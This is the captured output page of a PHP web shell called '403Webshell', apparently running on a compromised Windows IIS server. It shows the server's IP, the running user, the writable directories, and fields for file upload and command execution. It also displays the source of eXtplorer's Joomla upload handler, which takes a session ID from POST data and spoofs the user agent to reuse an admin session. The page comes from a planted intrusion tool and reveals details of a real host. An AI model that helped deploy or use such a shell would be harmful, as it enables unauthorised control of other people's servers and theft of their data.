403Webshell
Server IP : 195.130.67.5  /  Your IP : 216.73.217.154
Web Server : Microsoft-IIS/10.0
System : Windows NT WEBSERVER1 10.0 build 17763 (Windows Server 2016) i586
User : IUSR ( 0)
PHP Version : 7.4.19
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Old Sites/ees_request/administrator/components/com_extplorer/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /Old Sites/ees_request/administrator/components/com_extplorer//uploadhandler.php
<?php
// $Id: extplorer.php 164 2010-05-03 15:06:51Z soeren $
// eXtplorer Flash Upload Handler for Joomla!
if( @$_POST['option'] == 'com_extplorer' && !empty($_POST[session_name()]) && !defined('_JEXEC') ) {
	session_name( substr( $_POST['session_name'], 0 , 32 ) );
	$sess_id = substr( $_POST[session_name()], 0 , 32 );
	$_COOKIE[session_name()] = $sess_id;
	session_id( $sess_id );

	/**DEBUG
	$res = "\r\nTime: ".time()."\r\nSession Name: ".session_name().', Session ID: '.session_id();
	$res .= "\r\nUser Agent String: ".$_SERVER['HTTP_USER_AGENT'];
	$res .= "\r\nCOOKIE: ".print_r( $_COOKIE, true )."\r\nPOST: ".print_r( $_POST, true );
	//die( $res );
	//file_put_contents( 'debug.txt', $res, FILE_APPEND );
	//**/
	
	if( file_exists('../../../configuration.php') ){
		// we need to spoof J! 1.6 and modify the user agent to get the allowance to reuse the existing browser session
		$_SERVER['HTTP_USER_AGENT'] = stripslashes( $_POST['user_agent'] );
		session_start();
		//  we had our fun, enough values set-
		// now just continue with the default Joomla! /administrator/index.php
		require( '../../index.php' ); 
	} else {
		require( dirname(__FILE__).'/index.php' ); 
	}
	
}

Youez - 2016 - github.com/yon3zu
LinuXploit